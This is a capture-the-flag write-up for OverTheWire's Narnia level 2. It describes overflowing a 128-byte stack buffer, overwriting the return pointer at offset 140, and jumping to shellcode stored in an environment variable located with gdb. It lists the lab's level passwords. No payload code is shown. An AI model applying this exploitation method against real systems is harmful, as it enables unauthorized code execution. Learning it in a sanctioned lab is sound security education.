Level 2 Username : narnia2 Password : nairiepecu SSH : narnia.labs.overthewire.org:2226
To solve this level, we first ssh into the narnia server using the credentials provided above. Let’s have a look at the executable for this level and its source code.
As we can see, the executable copies the argument into a buffer and then prints it. The buffer size allocated is 128 characters. Therefore, if we can overflow the buffer by inserting more bytes than the executable expects, we can re-write the instruction pointer (EIP) to execute our shellcode. This level is very similar to the last level, however, this time around, the executable does not run our shellcode. We need to place our shellcode at a location whose address we are aware of and the executable can jump to it. In this scenario, I can think of two easy ways to solve this:
- Put the shellcode in the buffer and then jump to it after finding it’s address.
- Put the shellcode in an environment variable and jump to that address.
Since this level is very similar to the previous level, I decided to use environment variable to execute the shellcode. In the previous level, the executable executed our shellcode within the variable, however, this time around, we will need to replace the return pointer to jump to our shellcode address.
Let’s first determine after how many bytes does the executable overflows the return pointer.
As we can see above, the return pointer is overwritten after 140 characters. Therefore, we need to input our shellcode address after 140 characters.
Using the above programs, we will now create a simple python script to overflow the return pointer with the address returned by findeggaddr executable.
As we can see above, despite having an address for the shellcode, the executable throws a Segmentation Fault error with no core dump. At this point, to evaluate the core, I decided to make a copy of narnia2 executable in my temp directory and understand what’s happening behind the scene.
As we can see, the executable does return to our address, however, it still segment faults. Let’s see if our environment address is correct or not.
As we can see above, our address for EGG was incorrect and we can find the correct address by reading the environment variables inside gdb. After getting the correct value for shellcode address, we can execute narnia2 to get the password for the next level.
Level 3 Username : narnia3 Password : vaequeezee SSH : narnia.labs.overthewire.org:2226